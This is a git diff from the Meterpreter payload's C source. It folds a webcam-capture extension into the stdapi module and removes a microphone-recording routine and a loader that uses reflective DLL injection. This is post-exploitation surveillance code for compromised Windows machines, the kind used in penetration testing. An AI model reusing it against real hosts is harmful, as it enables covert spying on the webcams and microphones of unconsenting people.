diff --git a/c/meterpreter/source/extensions/stdapi/server/precomp.h b/c/meterpreter/source/extensions/stdapi/server/precomp.h index 0a0e29d7..bc9fb715 100644 --- a/c/meterpreter/source/extensions/stdapi/server/precomp.h +++ b/c/meterpreter/source/extensions/stdapi/server/precomp.h @@ -64,6 +64,7 @@ #include "sys/sys.h" #include "net/net.h" #include "ui/ui.h" +#include "webcam/webcam.h" #ifdef _WIN32 #include "railgun/railgun.h" // PKS, win32 specific at the moment. diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c index f7299dc7..79767f63 100644 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -379,6 +379,28 @@ Command customCommands[] = { request_sys_power_exitwindows, { 0 }, 0 }, { EMPTY_DISPATCH_HANDLER }, }, + + // Webcam + { "webcam_list", + { request_webcam_list, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + + { "webcam_start", + { request_webcam_start, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + + { "webcam_get_frame", + { request_webcam_get_frame, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + + { "webcam_stop", + { request_webcam_stop, { 0 }, 0 }, + { EMPTY_DISPATCH_HANDLER }, + }, + #endif // Terminator { NULL, diff --git a/c/meterpreter/source/extensions/webcam/bmp2jpeg.c b/c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c similarity index 96% rename from c/meterpreter/source/extensions/webcam/bmp2jpeg.c rename to c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c index bc8a2e69..23ca73f8 100644 --- a/c/meterpreter/source/extensions/webcam/bmp2jpeg.c +++ b/c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c @@ -1,6 +1,7 @@ #define WIN32_LEAN_AND_MEAN #include #include "bmp2jpeg.h" +#pragma comment(lib, "jpeg.lib") /* * Please Note: bmp2jpeg.c and bmp2jpeg.h have been coppied over from screen.c diff --git a/c/meterpreter/source/extensions/webcam/bmp2jpeg.h b/c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.h similarity index 100% rename from c/meterpreter/source/extensions/webcam/bmp2jpeg.h rename to c/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.h diff --git a/c/meterpreter/source/extensions/webcam/video.cpp b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp similarity index 96% rename from c/meterpreter/source/extensions/webcam/video.cpp rename to c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp index b4db24de..fa134675 100644 --- a/c/meterpreter/source/extensions/webcam/video.cpp +++ b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp @@ -1,12 +1,14 @@ //This software is based on Touchless, which is released under the Microsoft Public License (Ms-PL) +#ifdef CINTERFACE +#undef CINTERFACE +#endif #define WIN32_LEAN_AND_MEAN #include #include #pragma comment(lib, "strmiids") extern "C" { #include "../../common/common.h" -#include "main.h" -#include "video.h" +#include "webcam.h" #include "bmp2jpeg.h" } diff --git a/c/meterpreter/source/extensions/webcam/main.h b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.h similarity index 63% rename from c/meterpreter/source/extensions/webcam/main.h rename to c/meterpreter/source/extensions/stdapi/server/webcam/webcam.h index 457216dc..983ebf17 100644 --- a/c/meterpreter/source/extensions/webcam/main.h +++ b/c/meterpreter/source/extensions/stdapi/server/webcam/webcam.h @@ -1,5 +1,5 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_WEBCAM_WEBCAM_H -#define _METERPRETER_SOURCE_EXTENSION_WEBCAM_WEBCAM_H +#ifndef _METERPRETER_SOURCE_EXTENSION_WEBCAM_SERVER_VIDEO_H +#define _METERPRETER_SOURCE_EXTENSION_WEBCAM_SERVER_VIDEO_H #define TLV_TYPE_EXTENSION_WEBCAM 0 @@ -27,10 +27,8 @@ TLV_TYPE_EXTENSION_WEBCAM, \ TLV_EXTENSIONS + 4) -#define TLV_TYPE_WEBCAM_SOUND \ - MAKE_CUSTOM_TLV( \ - TLV_META_TYPE_RAW, \ - TLV_TYPE_EXTENSION_WEBCAM, \ - TLV_EXTENSIONS + 5) - +DWORD request_webcam_list(Remote *remote, Packet *packet); +DWORD request_webcam_start(Remote *remote, Packet *packet); +DWORD request_webcam_get_frame(Remote *remote, Packet *packet); +DWORD request_webcam_stop(Remote *remote, Packet *packet); #endif diff --git a/c/meterpreter/source/extensions/webcam/audio.c b/c/meterpreter/source/extensions/webcam/audio.c deleted file mode 100644 index eb4cb6c3..00000000 --- a/c/meterpreter/source/extensions/webcam/audio.c +++ /dev/null @@ -1,107 +0,0 @@ -#define _CRT_SECURE_NO_DEPRECATE 1 -#include "../../common/common.h" -#include -#include -#include -#include -#include -#include -#include "webcam.h" - - -#pragma comment(lib, "vfw32.lib") -#pragma comment(lib, "winmm.lib") - -#define capSendMessage(hWnd, uMsg, wParm, lParam) ((IsWindow(hWnd)) ? SendMessage(hWnd, uMsg, (WPARAM)(wParm), (LPARAM)(lParam)) : 0) - -BOOL capmicaudio(char *szFile, int millisecs) -{ - UINT wDeviceID; - DWORD dwReturn; - MCI_OPEN_PARMS mciOpenParms; - MCI_RECORD_PARMS mciRecordParms; - MCI_SAVE_PARMS mciSaveParms; - MCI_PLAY_PARMS mciPlayParms; - DWORD dwMilliSeconds; - - dwMilliSeconds = millisecs; - - // Open a waveform-audio device with a new file for recording. - mciOpenParms.lpstrDeviceType = "waveaudio"; - mciOpenParms.lpstrElementName = ""; - if (dwReturn = mciSendCommand(0, MCI_OPEN,MCI_OPEN_ELEMENT | MCI_OPEN_TYPE,(DWORD)(LPVOID) &mciOpenParms)) - { - // Failed to open device; don't close it, just return error. - return (dwReturn); - } - - // The device opened successfully; get the device ID. - wDeviceID = mciOpenParms.wDeviceID; - - mciRecordParms.dwTo = dwMilliSeconds; - if (dwReturn = mciSendCommand(wDeviceID, MCI_RECORD, - MCI_TO | MCI_WAIT, (DWORD)(LPVOID) &mciRecordParms)) - { - mciSendCommand(wDeviceID, MCI_CLOSE, 0, (DWORD_PTR)0 ); - return (dwReturn); - } - - // Play the recording and query user to save the file. - mciPlayParms.dwFrom = 0L; - - // Save the recording to a file. Wait for - // the operation to complete before continuing. - mciSaveParms.lpfilename = szFile; - if (dwReturn = mciSendCommand(wDeviceID, MCI_SAVE, MCI_SAVE_FILE | MCI_WAIT, (DWORD)(LPVOID) &mciSaveParms)) - { - mciSendCommand(wDeviceID, MCI_CLOSE, 0, (DWORD_PTR)0 ); - return (dwReturn); - } - - return (0L); -} - - - - -int __declspec(dllexport) controlmic(char **waveresults, int msecs) { - DWORD dwError = 0; - char *wavestring = NULL; - - /* METERPRETER CODE */ - // char buffer[100]; - /* END METERPRETER CODE */ - - capmicaudio("C:\\test.wav", msecs); - - *waveresults = wavestring; - - /* return the correct code */ - return dwError; -} - - -/* - * Grabs the audio from mic. - */ -DWORD request_audio_get_dev_audio(Remote *remote, Packet *packet) -{ - Packet *response = packet_create_response(packet); - DWORD res = ERROR_SUCCESS; - char *wave = NULL; - - if (controlmic(&wave,packet_get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME))) - { - res = GetLastError(); - } - - //packet_add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave); - - - packet_transmit_response(res, remote, response); - - if (wave) - free(wave); - - return res; -} diff --git a/c/meterpreter/source/extensions/webcam/audio.h b/c/meterpreter/source/extensions/webcam/audio.h deleted file mode 100644 index 4f1ef76b..00000000 --- a/c/meterpreter/source/extensions/webcam/audio.h +++ /dev/null @@ -1,6 +0,0 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_ESPIA_ESPIA_SERVER_AUDIO_H -#define _METERPRETER_SOURCE_EXTENSION_ESPIA_ESPIA_SERVER_AUDIO_H - -DWORD request_audio_get_dev_audio(Remote *remote, Packet *packet); - -#endif diff --git a/c/meterpreter/source/extensions/webcam/main.c b/c/meterpreter/source/extensions/webcam/main.c deleted file mode 100644 index 57460e3a..00000000 --- a/c/meterpreter/source/extensions/webcam/main.c +++ /dev/null @@ -1,88 +0,0 @@ -/* - * This module implements webcam capture and mic recording features. - */ -#define _CRT_SECURE_NO_DEPRECATE 1 -#include "../../common/common.h" -#include "main.h" -//#include "audio.h" -#include "video.h" - - -#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h" -// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function -// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the -// second stage reflective dll inject payload and not the metsrv itself when it loads extensions. -#include "../../ReflectiveDLLInjection/ReflectiveLoader.c" - -// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor - -// this sets the delay load hook function, see DelayLoadMetSrv.h -EnableDelayLoadMetSrv(); - -Command customCommands[] = -{ - // Video - { "webcam_list", - { request_webcam_list, { 0 }, 0 }, - { EMPTY_DISPATCH_HANDLER }, - }, - - { "webcam_start", - { request_webcam_start, { 0 }, 0 }, - { EMPTY_DISPATCH_HANDLER }, - }, - - { "webcam_get_frame", - { request_webcam_get_frame, { 0 }, 0 }, - { EMPTY_DISPATCH_HANDLER }, - }, - - { "webcam_stop", - { request_webcam_stop, { 0 }, 0 }, - { EMPTY_DISPATCH_HANDLER }, - }, - - // Audio -// { "webcam_audio_get_dev_audio", -// { request_audio_get_dev_audio, { 0 }, 0 }, -// { EMPTY_DISPATCH_HANDLER }, -// }, - - // Terminator - { NULL, - { EMPTY_DISPATCH_HANDLER }, - { EMPTY_DISPATCH_HANDLER }, - }, -}; - -/* - * Initialize the server extension - */ -DWORD __declspec(dllexport) InitServerExtension(Remote *remote) -{ - DWORD index; - - hMetSrv = remote->hMetSrv; - - for (index = 0; - customCommands[index].method; - index++) - command_register(&customCommands[index]); - - return ERROR_SUCCESS; -} - -/* - * Deinitialize the server extension - */ -DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) -{ - DWORD index; - - for (index = 0; - customCommands[index].method; - index++) - command_deregister(&customCommands[index]); - - return ERROR_SUCCESS; -} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/webcam/video.h b/c/meterpreter/source/extensions/webcam/video.h deleted file mode 100644 index d235a127..00000000 --- a/c/meterpreter/source/extensions/webcam/video.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_WEBCAM_SERVER_VIDEO_H -#define _METERPRETER_SOURCE_EXTENSION_WEBCAM_SERVER_VIDEO_H -DWORD request_webcam_list(Remote *remote, Packet *packet); -DWORD request_webcam_start(Remote *remote, Packet *packet); -DWORD request_webcam_get_frame(Remote *remote, Packet *packet); -DWORD request_webcam_stop(Remote *remote, Packet *packet); -#endif diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcproj index 7a6d4b37..ba468606 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcproj @@ -251,7 +251,7 @@ Name="VCCLCompilerTool" Optimization="2" InlineFunctionExpansion="1" - AdditionalIncludeDirectories="..\..\source\extensions\stdapi\server;..\..\source\openssl\include" + AdditionalIncludeDirectories="..\..\source\extensions\stdapi\server;..\..\source\openssl\include;..\..\source\jpeg-8" PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SYS_EXPORTS;_CRT_SECURE_NO_WARNINGS;CINTERFACE;COBJMACROS" StringPooling="true" RuntimeLibrary="0" @@ -279,11 +279,11 @@ /> + + + + + + + + + + + + + + + + + + + + + - - - - - - @@ -1580,6 +1620,30 @@ > + + + + + + + + + + + + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index 841e40e9..44275297 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -67,12 +67,6 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "screenshot", "screenshot\sc {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D} EndProjectSection EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_webcam", "ext_server_webcam\ext_server_webcam.vcproj", "{F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}" - ProjectSection(ProjectDependencies) = postProject - {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} - {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D} - EndProjectSection -EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 @@ -174,12 +168,6 @@ Global {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.Build.0 = Release|Win32 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.ActiveCfg = Release|x64 {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.Build.0 = Release|x64 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Debug|Win32.ActiveCfg = Debug|Win32 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Debug|Win32.Build.0 = Debug|Win32 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Debug|x64.ActiveCfg = Debug|Win32 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Release|Win32.ActiveCfg = Release|Win32 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Release|Win32.Build.0 = Release|Win32 - {F7C3A0FF-982C-4C80-A61F-B8A2FDCE3B74}.Release|x64.ActiveCfg = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE